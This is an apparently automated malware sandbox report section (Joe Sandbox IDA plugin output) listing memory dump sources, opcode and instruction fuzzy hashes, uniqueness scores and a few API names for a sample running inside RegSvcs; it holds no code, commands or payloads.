                                                • Opcode ID: 5223b6cf5b1b291eb77e3c6624ec76b6e3aa022934a0ce09c996c2bc72575bc3
                                                • Instruction ID: 0ae5e610a65e41bda2fd32fa25787a27322b37b8afd5322629b4270885e97530
                                                • Opcode Fuzzy Hash: 5223b6cf5b1b291eb77e3c6624ec76b6e3aa022934a0ce09c996c2bc72575bc3
                                                • Instruction Fuzzy Hash: 0121AC75509380CFDB07CF24D990B15BF71EB46214F28C5EAD8498B2A7C33AD80ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: 48845a4a11230f94f750828967b020e54fd58675717301bc8faab85d8dca5560
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: B411CD76404240CFCF06CF54D5C0B56BF61FB94224F2882A9D8090B656C33AE456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction ID: ff9b669ba18ebadc6234a191f6e8b3588c9ceb47fb2c794a3433996889ac78ac
                                                • Opcode Fuzzy Hash: 1166f709330a6c50fb0ccab333658baa4cf0de4601631cd9e1789cef95a599a7
                                                • Instruction Fuzzy Hash: 9711CD72504280CFCF06CF54E5C0B16BF71FB98614F2486A9D8490B256C336D456CBA2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414551843.000000000115D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0115D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_115d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction ID: b576c4f617dc5bcd94cb4d6a981f36c5a1529dff3cae29adcae2820e3ad07dd8
                                                • Opcode Fuzzy Hash: 5930c3722e95abe2067eb95ddfb8aa1848112c8b53b048d5b6b565b5491e75cf
                                                • Instruction Fuzzy Hash: 3711BB75504280DFCB0ACF54D5C0B15BFA1FB84224F24C6ADDC494B296C33AD44ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d6641e9dd90a84e747a0940d546dd9865724de7f9c22ec6553e9c4a180e15665
                                                • Instruction ID: 38331b1c7a417f5a0b3826f51ba7f2199f415b977fe9c5dd49e950d1a9744c9f
                                                • Opcode Fuzzy Hash: d6641e9dd90a84e747a0940d546dd9865724de7f9c22ec6553e9c4a180e15665
                                                • Instruction Fuzzy Hash: D2012B31004B809FFF28CF95DC84B66BFA8DF51A69F14C51AED080E282D3799841CAB7
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000000E.00000002.1414471125.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_14_2_114d000_bgURAojpNNIb.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6982330a6697d0d469ed3d5ef3dcaf6a60c0b72f02c43e1a7b7c33862407fdc8
                                                • Instruction ID: 51033e3415a64a19f7f080bb1476540ec8fd776d73441fd7e46b73e617e27b67
                                                • Opcode Fuzzy Hash: 6982330a6697d0d469ed3d5ef3dcaf6a60c0b72f02c43e1a7b7c33862407fdc8
                                                • Instruction Fuzzy Hash: D8F0C2314047849FFF24CE59D888B62FFA8EB51638F18C05AED084E286C3799844CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Execution Graph

                                                Execution Coverage:11.4%
                                                Dynamic/Decrypted Code Coverage:100%
                                                Signature Coverage:0%
                                                Total number of Nodes:16
                                                Total number of Limit Nodes:3
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 97988ad934ef57cea960f9f62397ca1a888a4b9ddbf2c7fd105fba54725a9920
                                                • Instruction ID: c05c59a6e657c43d124974b2de25be5c94003d9fed43f88e92ff0994f60eeaaf
                                                • Opcode Fuzzy Hash: 97988ad934ef57cea960f9f62397ca1a888a4b9ddbf2c7fd105fba54725a9920
                                                • Instruction Fuzzy Hash: EE632A31D10A198EDB11EF68C894AA9F7B1FF99300F55D6DAE44877121EB70AAC4CF81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c252b51f3748d036cb350319672cd39b9224c7795f1ac6457a6a61b471f003e2
                                                • Instruction ID: e04448381728d931205669050a6487426a4cbc40c84f7080055a9f5c67876c66
                                                • Opcode Fuzzy Hash: c252b51f3748d036cb350319672cd39b9224c7795f1ac6457a6a61b471f003e2
                                                • Instruction Fuzzy Hash: A1332031D107198EDB11EFA8C8906ADF7B1FF99300F55C79AD458AB211EB70AAC5CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: 1f338b998cc056ef050c9bb3ddc6c5343cb2e6884081f99185bd615d5e26dbba
                                                • Instruction ID: 99917dd25411679ba96b57bf965302d1669d003c4a5cbdfe1613c96bcf952d58
                                                • Opcode Fuzzy Hash: 1f338b998cc056ef050c9bb3ddc6c5343cb2e6884081f99185bd615d5e26dbba
                                                • Instruction Fuzzy Hash: 9D915A74E102498FDF50CFA9C9817DEBBF2BF88314F588129E495EB254DB749886CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1c7635766dacca2f2a9290aace3f10e03457bf034bb3b72976bab9b0887e9a90
                                                • Instruction ID: d494b9effe88f54369ba59855552a1bf654c6c956b09ed2080567aeac004e41f
                                                • Opcode Fuzzy Hash: 1c7635766dacca2f2a9290aace3f10e03457bf034bb3b72976bab9b0887e9a90
                                                • Instruction Fuzzy Hash: FA329934B002048FDB15DFA8D990AADBBB2FF88314F6485A9E945EB395DB34DC41CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 39dc0e8ad858c392f1d33f1a6e675d926ed230191c4751079960b60aa959e3c0
                                                • Instruction ID: fe8140b8458afe197bdaa41e18f2faa6f3111fe02cfce36239a3dae1928e9f69
                                                • Opcode Fuzzy Hash: 39dc0e8ad858c392f1d33f1a6e675d926ed230191c4751079960b60aa959e3c0
                                                • Instruction Fuzzy Hash: 37B17D74E002098FDB50DFE8C8817DDBBF2BF88314F588129D858EB254EBB49885CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: 57ccbbd059ff6b693312cbf390222fd2ebca4a8c57de7a287bc235f2ea333384
                                                • Instruction ID: 6d27e90f522fc07cfcb3091918bc74fc5b83d79e86451235246267ccf1d62145
                                                • Opcode Fuzzy Hash: 57ccbbd059ff6b693312cbf390222fd2ebca4a8c57de7a287bc235f2ea333384
                                                • Instruction Fuzzy Hash: FD717974E002498FDB10CFE9D8817DEBBF2BF88314F588129E455EB254EBB49846CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j$\V}j
                                                • API String ID: 0-799745403
                                                • Opcode ID: b774269172f9f0b63b0aaebaf857e7af1e42e30f9ed6f99056d67f19eb4fa82f
                                                • Instruction ID: 79c929c67f6e9fdff0fc014cb9be020a0d6226a47ab52b2a36a9ac703b139ab0
                                                • Opcode Fuzzy Hash: b774269172f9f0b63b0aaebaf857e7af1e42e30f9ed6f99056d67f19eb4fa82f
                                                • Instruction Fuzzy Hash: B7717A74E00249CFDB10CFA9D8907DEBBF2BF88314F588129E455E7254EBB49846CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 571dd1abd11d18e6df7473d9e410f12bf7beb7457470684b6ac2967dec332645
                                                • Instruction ID: ccd7996bf2a360fca4156159f37facf8e9fb33e03f1ca506d51f5bdfd8eec721
                                                • Opcode Fuzzy Hash: 571dd1abd11d18e6df7473d9e410f12bf7beb7457470684b6ac2967dec332645
                                                • Instruction Fuzzy Hash: E6412032E047598FDB14CFB9C8043AEBBF5EF89210F0485ABD808E7251DB789841CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F7E1F2), ref: 05F7E2DF
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: fae91d25e6cd376023d0f3bc768d9d996caa66299399eb6f195d459017040c43
                                                • Instruction ID: f5ec2cad5e380324cd20f14c7ddc76826e281039e10e2ef2a6c1507d8e9fd46f
                                                • Opcode Fuzzy Hash: fae91d25e6cd376023d0f3bc768d9d996caa66299399eb6f195d459017040c43
                                                • Instruction Fuzzy Hash: AF1117B1C006599BDB20CFAAC4447EEFBF8FF48210F10816AE918B7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                APIs
                                                • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05F7E1F2), ref: 05F7E2DF
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2542911291.0000000005F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F70000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_5f70000_RegSvcs.jbxd
                                                Similarity
                                                • API ID: GlobalMemoryStatus
                                                • String ID:
                                                • API String ID: 1890195054-0
                                                • Opcode ID: fed988ff5571707bc9b526125fc6442020a611be3168e941e364c1f183fcf155
                                                • Instruction ID: 68b90262800d7c18dedf7477670c1cc1d205d34b3a317076d9ef189b161f9ba5
                                                • Opcode Fuzzy Hash: fed988ff5571707bc9b526125fc6442020a611be3168e941e364c1f183fcf155
                                                • Instruction Fuzzy Hash: 7A1106B1C006599BDB10CF9AC4457DEFBF4EB48210F14816AD818A7240D778A945CFA5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Control-flow Graph

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: \V}j
                                                • API String ID: 0-4284003065
                                                • Opcode ID: ebcdc18f867a8a7a0a222953141d3f2d6fbc9f714174201fe5022e523721fa09
                                                • Instruction ID: 85d57a8338d43097c8fc56a73e964a990754e55b8a9d7af192b24094eb3f7ce1
                                                • Opcode Fuzzy Hash: ebcdc18f867a8a7a0a222953141d3f2d6fbc9f714174201fe5022e523721fa09
                                                • Instruction Fuzzy Hash: 53916970E002498FDF60CFA8C8817DEBBF1BF48314F588129E494EB254EB749886CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: D
                                                • API String ID: 0-2746444292
                                                • Opcode ID: 6dc9c9ad5f9df164753817bd1047f105a6764bfa5bcdea5811ecef324ae2c020
                                                • Instruction ID: 876f83df6e59101b0961c5d23c8c6e6bebd564147fa51fa09e4deb8b51ccefba
                                                • Opcode Fuzzy Hash: 6dc9c9ad5f9df164753817bd1047f105a6764bfa5bcdea5811ecef324ae2c020
                                                • Instruction Fuzzy Hash: 2911C231F002159FDF51EFFC84842EE7BE5EB48214F9404BAD985EB202EB35C8428B91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 9cd8fb1d0245d08a338421bb887af1ba064ff67e94ab7dc1e32a169a6d9521c0
                                                • Instruction ID: 69ab0ed1724427644e35af2363aebdf4fa993ae86e2f5b1b3a7a3b8b7bb0993a
                                                • Opcode Fuzzy Hash: 9cd8fb1d0245d08a338421bb887af1ba064ff67e94ab7dc1e32a169a6d9521c0
                                                • Instruction Fuzzy Hash: BB12AF307106058FDB2AAF3CE88572C76A6EBC9350B508A29E446CB756DF76DC42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: e0d05d540fa5c6e3ab9110b5a18859f79ce4c80090eecc05dfc907d0133ca628
                                                • Instruction ID: 23e4a4b24d3daeb6b63d0fa5420430d7fa5a21aea8100622fe2d359ecb3d315c
                                                • Opcode Fuzzy Hash: e0d05d540fa5c6e3ab9110b5a18859f79ce4c80090eecc05dfc907d0133ca628
                                                • Instruction Fuzzy Hash: 6712A0307106058BDB2AAF3CE88572C76A6EBC9350B508A2DE446CB746DF76DC42CF91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c1d17d299eb6075d93764dad72e373dd5fc9b4f05e3ca69bf9adcb20211ffcfa
                                                • Instruction ID: 885661faed363ef0af9e72b86a68ac7391a764263cb8bcf79d88d7a8f5bc6803
                                                • Opcode Fuzzy Hash: c1d17d299eb6075d93764dad72e373dd5fc9b4f05e3ca69bf9adcb20211ffcfa
                                                • Instruction Fuzzy Hash: D7B15B74E102598FDB50DFE8D8817DDBBF1BF48314F588129D898EB254EBB49886CB81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: dbe116fd00b62ec5f2dd48825aa93435db76b7e667daae66f4d4b8d0305c3092
                                                • Instruction ID: af9d26643045ce087edf2db1df38f012dac84129c042a604a2bfe77f4511b830
                                                • Opcode Fuzzy Hash: dbe116fd00b62ec5f2dd48825aa93435db76b7e667daae66f4d4b8d0305c3092
                                                • Instruction Fuzzy Hash: 83918D34B002148FDB15DFA8D594AADBBF2EF88314F648465E446E73A5DB31DC42CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4998e5346e5e6765f94926242e3f2ae1024e401c2139977b7b72982f8ee1aa2a
                                                • Instruction ID: c860f8ce83223d3df8260fa2ab4919e3cabd1a4d4787d38903e11be0dc0ace6f
                                                • Opcode Fuzzy Hash: 4998e5346e5e6765f94926242e3f2ae1024e401c2139977b7b72982f8ee1aa2a
                                                • Instruction Fuzzy Hash: 6F51B230E002149FDB15DBBCC4557AEBBB2FF85300F50856AE446EB281DB729842CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c4ce52346f539a82235da26dc4e994454b52435c6bec1016fb20361f59be39d2
                                                • Instruction ID: 4337e99e8e0bc573155ac6c73f1088d35ebeb93015b681348e1d9d821c9d4ac9
                                                • Opcode Fuzzy Hash: c4ce52346f539a82235da26dc4e994454b52435c6bec1016fb20361f59be39d2
                                                • Instruction Fuzzy Hash: 02511371D002188FDB24CFA9C885BDDBBF1BF48300F588119E855BB351D775A885CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 612b1a152301fa027f9d1e06aec5eb57e7ee78a38344b60ce36e246017250724
                                                • Instruction ID: d98be6de849a965f2f41e5b3e6aad044b5d0192613192e0fdbc61ab7b23f7233
                                                • Opcode Fuzzy Hash: 612b1a152301fa027f9d1e06aec5eb57e7ee78a38344b60ce36e246017250724
                                                • Instruction Fuzzy Hash: 1A511271D002188FDB18DFA9C888B9DFBF1BF48310F588129E855BB391D779A884CB95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ca790aed83f3fb3b8bfcc45e086e7651c72b73e2720bbb4bf55f0d717f307844
                                                • Instruction ID: 3a1f780446d3d90cdf6409585541340f8c40d33c71b4c2b3b3f28c5db3647868
                                                • Opcode Fuzzy Hash: ca790aed83f3fb3b8bfcc45e086e7651c72b73e2720bbb4bf55f0d717f307844
                                                • Instruction Fuzzy Hash: A3511C341133418FDB0AFF28F891B493B72F7553493008969D0439B67ADA7169A7CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70c3a689909d932510423e90c98a98af1b8758909c1c48f50f697e24350f2dda
                                                • Instruction ID: 99d7ee6174e7b21d6869a7f55ed423b143f690081c493831a84431c7a18b32fe
                                                • Opcode Fuzzy Hash: 70c3a689909d932510423e90c98a98af1b8758909c1c48f50f697e24350f2dda
                                                • Instruction Fuzzy Hash: 915109341133418FDB0AFF28F891B493B76F7953493008968D0439B67ADA6169A7CF92
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: decaf870f91149527db27f47eee2cf7b23a0c9ec6a9f5333a454005d8526d113
                                                • Instruction ID: 9b2903ffb2f9ed4da20c607ae3010ad33058d6a7d8c16e4fa728204a263f09e1
                                                • Opcode Fuzzy Hash: decaf870f91149527db27f47eee2cf7b23a0c9ec6a9f5333a454005d8526d113
                                                • Instruction Fuzzy Hash: DF3107307002029FEB19AF78D45466E7BE2EF89250F64456DD086DB396DF39CC42CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 10d4d6e474d10383a39db239dae4570a4d3eefb190f016ac9e406b17e0fb4a52
                                                • Instruction ID: 9cde12b6b93a2deb2979accf68de40c96a1bc41dde0d4b9d22b73c7dce9557c3
                                                • Opcode Fuzzy Hash: 10d4d6e474d10383a39db239dae4570a4d3eefb190f016ac9e406b17e0fb4a52
                                                • Instruction Fuzzy Hash: CE31F030B002028FEB6AAF78D55466E3BE3AF89240F60456CD086DB395EF35CD41CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: f51f260e630ab4ab189f55bd307715fa186e1d82304b3aded5e9e802d7bec815
                                                • Instruction ID: b37bb76e0f2c751887d68d9373477307dee388cbbbaf07f348b2c6ba75da520b
                                                • Opcode Fuzzy Hash: f51f260e630ab4ab189f55bd307715fa186e1d82304b3aded5e9e802d7bec815
                                                • Instruction Fuzzy Hash: 8131DD34B002098FDFA59EECD98076FBBA6FB85314F600869C54ADB380DA34DC418BA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a3577fb8f8d76326a926f1aecfcf770f3c6dba4c82f48176d846dc4c61a4e2c5
                                                • Instruction ID: 7e992c578575890e4d47959ba262d1409e49a366d4cfa93372ba50d1ca0c8b0b
                                                • Opcode Fuzzy Hash: a3577fb8f8d76326a926f1aecfcf770f3c6dba4c82f48176d846dc4c61a4e2c5
                                                • Instruction Fuzzy Hash: B1315E35A106169BDB15CFA8D49469EBBB2EF88300F508929E846EB751DF74E842CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 42338e6358c9f95399ce53eb4080304dc65427c2e6de34fcacd63363c45f01a0
                                                • Instruction ID: edf94b76703c7172a32a29c29062c8249f70e0cce9c31a1b9e8e52fe443e7f2a
                                                • Opcode Fuzzy Hash: 42338e6358c9f95399ce53eb4080304dc65427c2e6de34fcacd63363c45f01a0
                                                • Instruction Fuzzy Hash: A641CEB4D01348DFEB20CFA9C484ADEBBB5FF48310F64842AE419AB254DB759946CB90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 527882de0cc6d1e7801bbec94ef5fba0170352ad20280574f1ef637a69ddfede
                                                • Instruction ID: 03392e1084ec8eb1680283f7a6e02948eabdee02f5cea9a02312b7dbc6f9a050
                                                • Opcode Fuzzy Hash: 527882de0cc6d1e7801bbec94ef5fba0170352ad20280574f1ef637a69ddfede
                                                • Instruction Fuzzy Hash: DF317034E40209DBDB25CFA8D444B9EB7F5FF85310F90856AF445EB241EB72A942CB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 00000012.00000002.2533268457.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_18_2_10a0000_RegSvcs.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 5f076d29098c25b61f9dce39b70f12fb29fa3170634858b8becca190cb4a7a0a
                                                • Instruction ID: 92b50472f5a3d68880d231674211a6cf41f4303710fb2d4efd8f4f6155fd3f22
